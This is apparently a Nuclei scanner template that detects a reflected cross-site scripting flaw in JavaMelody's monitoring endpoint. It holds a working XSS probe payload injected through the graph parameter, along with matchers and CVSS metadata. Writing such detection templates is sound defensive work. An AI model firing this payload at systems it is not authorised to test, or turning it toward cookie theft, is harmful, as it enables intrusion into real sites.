id: java-melody-xss

info:
  name: JavaMelody - Cross-Site Scripting
  author: kailashbohara
  severity: high
  description: JavaMelody contains a cross-site scripting vulnerability via the monitoring parameter. An attacker can execute arbitrary script in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://github.com/Hurdano/JavaMelody-XSS
    - https://github.com/javamelody/javamelody/pull/555
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: xss,javamelody

http:
  - method: GET
    path:
      - '{{BaseURL}}/monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# digest: 490a00463044022023575e20807c24be4b7bbed37e2fc5d366e36fbe797b7800a0684ff265247e4502203cea9030fa690db1fd45b2fb618bb92ce309148f538b32f7b28dc5b1536365db:922c64590222798bb761d5b6d8e72950
